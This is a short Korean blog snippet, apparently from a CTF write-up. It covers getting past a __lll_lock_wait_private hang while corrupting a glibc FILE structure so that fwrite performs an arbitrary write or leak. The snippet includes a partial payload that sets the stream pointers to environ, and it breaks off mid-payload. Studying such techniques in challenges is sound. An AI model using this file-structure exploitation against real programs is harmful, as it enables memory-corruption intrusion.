file structure __lll_lock_wait_private 우회
·
File Structure
문제를 풀다가 생긴 문제점을 간단하게 요약하겠다. fwrite 함수를 파일 스트럭쳐를 변조한 뒤 call 하여 aaw를 하던 와중, 분명 fwrite 함수가 실행됐는데 입력을 받으며 멈춰있는 현상이 발생했고, 페이로드는 아래와 같았다. pay += p64(0) #read ptr pay += p64(environ) #read end pay += p64(0) #read base pay += p64(environ) #write base pay += p64(environ+0x100) #write ptr pay += p64(0) #write end pay += p64(0) #buf base pay += p64(0) #buf end pay += p64(0) #save base pay += p64(0) #backup..